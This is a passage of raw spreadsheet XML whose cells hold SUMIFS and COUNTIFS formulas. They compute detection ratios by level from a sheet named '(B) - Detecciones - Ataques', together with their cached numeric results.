        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ45,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ45 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ45,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ45 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.6666666667</v>
      </c>
      <c r="FE45" s="621"/>
      <c r="FF45" s="621"/>
      <c r="FG45" s="621"/>
      <c r="FH45" s="621"/>
      <c r="FI45" s="621"/>
      <c r="FJ45" s="621"/>
      <c r="FK45" s="621"/>
      <c r="FL45" s="621"/>
      <c r="FM45" s="621"/>
      <c r="FN45" s="621"/>
      <c r="FO45" s="621"/>
      <c r="FP45" s="621"/>
      <c r="FQ45" s="621"/>
      <c r="FR45" s="621"/>
      <c r="FS45" s="621"/>
      <c r="FT45" s="621"/>
      <c r="FU45" s="621"/>
    </row>
    <row r="46">
      <c r="EL46" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP37&lt;&gt;0,'(B) - Detecciones - Ataques'!IP37*'(B) - Detecciones - Ataques'!IL37/('(B) - Detecciones - Ataques'!IL37+'(B) - Detecciones - Ataques'!IN37),0)</f>
        <v>0</v>
      </c>
      <c r="EM46" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP37&lt;&gt;0,'(B) - Detecciones - Ataques'!IP37*'(B) - Detecciones - Ataques'!IN37/('(B) - Detecciones - Ataques'!IL37+'(B) - Detecciones - Ataques'!IN37),0)</f>
        <v>0</v>
      </c>
      <c r="EN46" s="626"/>
      <c r="EO46" s="626"/>
      <c r="EP46" s="744"/>
      <c r="EQ46" s="745"/>
      <c r="ER46" s="745"/>
      <c r="ES46" s="745"/>
      <c r="ET46" s="745"/>
      <c r="EU46" s="745"/>
      <c r="EV46" s="745"/>
      <c r="EW46" s="745"/>
      <c r="EX46" s="745"/>
      <c r="EY46" s="745"/>
      <c r="EZ46" s="379" t="s">
        <v>1373</v>
      </c>
      <c r="FA46" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ46)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ46 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ46)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ46 &amp; "*"))</f>
        <v>0.4209203914</v>
      </c>
      <c r="FB46" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ46)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ46 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ46)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ46 &amp; "*"))</f>
        <v>0.5263157895</v>
      </c>
      <c r="FC46" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ46,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ46 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ46,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ46 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.4209203914</v>
      </c>
      <c r="FD46" s="635" t="s">
        <v>12</v>
      </c>
      <c r="FE46" s="403"/>
      <c r="FF46" s="403"/>
      <c r="FG46" s="403"/>
      <c r="FH46" s="403"/>
      <c r="FI46" s="403"/>
      <c r="FJ46" s="403"/>
      <c r="FK46" s="403"/>
      <c r="FL46" s="403"/>
      <c r="FM46" s="403"/>
      <c r="FN46" s="403"/>
      <c r="FO46" s="403"/>
      <c r="FP46" s="403"/>
      <c r="FQ46" s="403"/>
      <c r="FR46" s="403"/>
      <c r="FS46" s="403"/>
      <c r="FT46" s="403"/>
      <c r="FU46" s="403"/>
    </row>
    <row r="47">
      <c r="EL47" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP38&lt;&gt;0,'(B) - Detecciones - Ataques'!IP38*'(B) - Detecciones - Ataques'!IL38/('(B) - Detecciones - Ataques'!IL38+'(B) - Detecciones - Ataques'!IN38),0)</f>
        <v>0</v>
      </c>
      <c r="EM47" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP38&lt;&gt;0,'(B) - Detecciones - Ataques'!IP38*'(B) - Detecciones - Ataques'!IN38/('(B) - Detecciones - Ataques'!IL38+'(B) - Detecciones - Ataques'!IN38),0)</f>
        <v>0</v>
      </c>
      <c r="EN47" s="626"/>
      <c r="EO47" s="626"/>
      <c r="EP47" s="744"/>
      <c r="EQ47" s="745"/>
      <c r="ER47" s="745"/>
      <c r="ES47" s="745"/>
      <c r="ET47" s="745"/>
      <c r="EU47" s="745"/>
      <c r="EV47" s="745"/>
      <c r="EW47" s="745"/>
      <c r="EX47" s="745"/>
      <c r="EY47" s="745"/>
      <c r="EZ47" s="379" t="s">
        <v>209</v>
      </c>
      <c r="FA47" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ47)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ47 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ47)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ47 &amp; "*"))</f>
        <v>0.7307692308</v>
      </c>
      <c r="FB47" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ47)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ47 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ47)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ47 &amp; "*"))</f>
        <v>0.6923076923</v>
      </c>
      <c r="FC47" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ47,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ47 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ47,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ47 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.8333333333</v>
      </c>
      <c r="FD47" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ47,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ47 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ47,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ47 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.7142857143</v>
      </c>
      <c r="FE47" s="621"/>
      <c r="FF47" s="621"/>
      <c r="FG47" s="621"/>
      <c r="FH47" s="621"/>
      <c r="FI47" s="621"/>
      <c r="FJ47" s="621"/>
      <c r="FK47" s="621"/>
      <c r="FL47" s="621"/>
      <c r="FM47" s="621"/>
      <c r="FN47" s="621"/>
      <c r="FO47" s="621"/>
      <c r="FP47" s="621"/>
      <c r="FQ47" s="621"/>
      <c r="FR47" s="621"/>
      <c r="FS47" s="621"/>
      <c r="FT47" s="621"/>
      <c r="FU47" s="621"/>
    </row>
    <row r="48">
      <c r="EL48" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP39&lt;&gt;0,'(B) - Detecciones - Ataques'!IP39*'(B) - Detecciones - Ataques'!IL39/('(B) - Detecciones - Ataques'!IL39+'(B) - Detecciones - Ataques'!IN39),0)</f>
        <v>0</v>
      </c>
      <c r="EM48" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP39&lt;&gt;0,'(B) - Detecciones - Ataques'!IP39*'(B) - Detecciones - Ataques'!IN39/('(B) - Detecciones - Ataques'!IL39+'(B) - Detecciones - Ataques'!IN39),0)</f>
        <v>0</v>
      </c>
      <c r="EN48" s="626"/>
      <c r="EO48" s="626"/>
      <c r="EP48" s="744"/>
      <c r="EQ48" s="745"/>
      <c r="ER48" s="745"/>
      <c r="ES48" s="745"/>
      <c r="ET48" s="745"/>
      <c r="EU48" s="745"/>
      <c r="EV48" s="745"/>
      <c r="EW48" s="745"/>
      <c r="EX48" s="745"/>
      <c r="EY48" s="745"/>
      <c r="EZ48" s="379" t="s">
        <v>664</v>
      </c>
      <c r="FA48" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ48)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ48 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ48)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ48 &amp; "*"))</f>
        <v>0.5</v>
      </c>
      <c r="FB48" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ48)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ48 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ48)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ48 &amp; "*"))</f>
        <v>0.625</v>
      </c>
      <c r="FC48" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ48,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ48 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ48,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ48 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.5</v>
      </c>
      <c r="FD48" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ48,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ48 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ48,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ48 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.6666666667</v>
      </c>
      <c r="FE48" s="621"/>
      <c r="FF48" s="621"/>
      <c r="FG48" s="621"/>
      <c r="FH48" s="621"/>
      <c r="FI48" s="621"/>
      <c r="FJ48" s="621"/>
      <c r="FK48" s="621"/>
      <c r="FL48" s="621"/>
      <c r="FM48" s="621"/>
      <c r="FN48" s="621"/>
      <c r="FO48" s="621"/>
      <c r="FP48" s="621"/>
      <c r="FQ48" s="621"/>
      <c r="FR48" s="621"/>
      <c r="FS48" s="621"/>
      <c r="FT48" s="621"/>
      <c r="FU48" s="621"/>
    </row>
    <row r="49">
      <c r="EL49" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP40&lt;&gt;0,'(B) - Detecciones - Ataques'!IP40*'(B) - Detecciones - Ataques'!IL40/('(B) - Detecciones - Ataques'!IL40+'(B) - Detecciones - Ataques'!IN40),0)</f>
        <v>1</v>
      </c>
      <c r="EM49" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP40&lt;&gt;0,'(B) - Detecciones - Ataques'!IP40*'(B) - Detecciones - Ataques'!IN40/('(B) - Detecciones - Ataques'!IL40+'(B) - Detecciones - Ataques'!IN40),0)</f>
        <v>0</v>
      </c>
      <c r="EN49" s="626"/>
      <c r="EO49" s="626"/>
      <c r="EP49" s="744"/>
      <c r="EQ49" s="745"/>
      <c r="ER49" s="745"/>
      <c r="ES49" s="745"/>
      <c r="ET49" s="745"/>
      <c r="EU49" s="745"/>
      <c r="EV49" s="745"/>
      <c r="EW49" s="745"/>
      <c r="EX49" s="745"/>
      <c r="EY49" s="745"/>
      <c r="EZ49" s="379" t="s">
        <v>357</v>
      </c>
      <c r="FA49" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ49)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ49 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ49)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ49 &amp; "*"))</f>
        <v>0.8</v>
      </c>
      <c r="FB49" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ49)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ49 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ49)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ49 &amp; "*"))</f>
        <v>0.8</v>
      </c>
      <c r="FC49" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ49,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ49 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ49,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ49 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.6666666667</v>
      </c>
      <c r="FD49" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ49,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ49 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ49,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ49 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>1</v>
      </c>
      <c r="FE49" s="621"/>
      <c r="FF49" s="621"/>
      <c r="FG49" s="621"/>
      <c r="FH49" s="621"/>
      <c r="FI49" s="621"/>
      <c r="FJ49" s="621"/>
      <c r="FK49" s="621"/>
      <c r="FL49" s="621"/>
      <c r="FM49" s="621"/>
      <c r="FN49" s="621"/>
      <c r="FO49" s="621"/>
      <c r="FP49" s="621"/>
      <c r="FQ49" s="621"/>
      <c r="FR49" s="621"/>
      <c r="FS49" s="621"/>
      <c r="FT49" s="621"/>
      <c r="FU49" s="621"/>
    </row>
    <row r="50">
      <c r="EL50" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP41&lt;&gt;0,'(B) - Detecciones - Ataques'!IP41*'(B) - Detecciones - Ataques'!IL41/('(B) - Detecciones - Ataques'!IL41+'(B) - Detecciones - Ataques'!IN41),0)</f>
        <v>0.5</v>
      </c>
      <c r="EM50" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP41&lt;&gt;0,'(B) - Detecciones - Ataques'!IP41*'(B) - Detecciones - Ataques'!IN41/('(B) - Detecciones - Ataques'!IL41+'(B) - Detecciones - Ataques'!IN41),0)</f>
        <v>0.5</v>
      </c>
      <c r="EN50" s="626"/>
      <c r="EO50" s="626"/>
      <c r="EP50" s="744"/>
      <c r="EQ50" s="745"/>
      <c r="ER50" s="745"/>
      <c r="ES50" s="745"/>
      <c r="ET50" s="745"/>
      <c r="EU50" s="745"/>
      <c r="EV50" s="745"/>
      <c r="EW50" s="745"/>
      <c r="EX50" s="745"/>
      <c r="EY50" s="745"/>
      <c r="EZ50" s="379" t="s">
        <v>310</v>
      </c>
      <c r="FA50" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ50)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ50 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ50)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ50 &amp; "*"))</f>
        <v>0.5968052268</v>
      </c>
      <c r="FB50" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ50)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ50 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ50)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ50 &amp; "*"))</f>
        <v>0.6</v>
      </c>
      <c r="FC50" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ50,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ50 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ50,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ50 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.6613420447</v>
      </c>
      <c r="FD50" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ50,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ50 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ50,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ50 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.5</v>
      </c>
      <c r="FE50" s="621"/>
      <c r="FF50" s="621"/>
      <c r="FG50" s="621"/>
      <c r="FH50" s="621"/>
      <c r="FI50" s="621"/>
      <c r="FJ50" s="621"/>
      <c r="FK50" s="621"/>
      <c r="FL50" s="621"/>
      <c r="FM50" s="621"/>
      <c r="FN50" s="621"/>
      <c r="FO50" s="621"/>
      <c r="FP50" s="621"/>
      <c r="FQ50" s="621"/>
      <c r="FR50" s="621"/>
      <c r="FS50" s="621"/>
      <c r="FT50" s="621"/>
      <c r="FU50" s="621"/>
    </row>
    <row r="51">
      <c r="EL51" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP42&lt;&gt;0,'(B) - Detecciones - Ataques'!IP42*'(B) - Detecciones - Ataques'!IL42/('(B) - Detecciones - Ataques'!IL42+'(B) - Detecciones - Ataques'!IN42),0)</f>
        <v>0</v>
      </c>
      <c r="EM51" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP42&lt;&gt;0,'(B) - Detecciones - Ataques'!IP42*'(B) - Detecciones - Ataques'!IN42/('(B) - Detecciones - Ataques'!IL42+'(B) - Detecciones - Ataques'!IN42),0)</f>
        <v>0</v>
      </c>
      <c r="EN51" s="626"/>
      <c r="EO51" s="626"/>
      <c r="EP51" s="744"/>
      <c r="EQ51" s="745"/>
      <c r="ER51" s="745"/>
      <c r="ES51" s="745"/>
      <c r="ET51" s="745"/>
      <c r="EU51" s="745"/>
      <c r="EV51" s="745"/>
      <c r="EW51" s="745"/>
      <c r="EX51" s="745"/>
      <c r="EY51" s="745"/>
      <c r="EZ51" s="379" t="s">
        <v>292</v>
      </c>
      <c r="FA51" s="621">
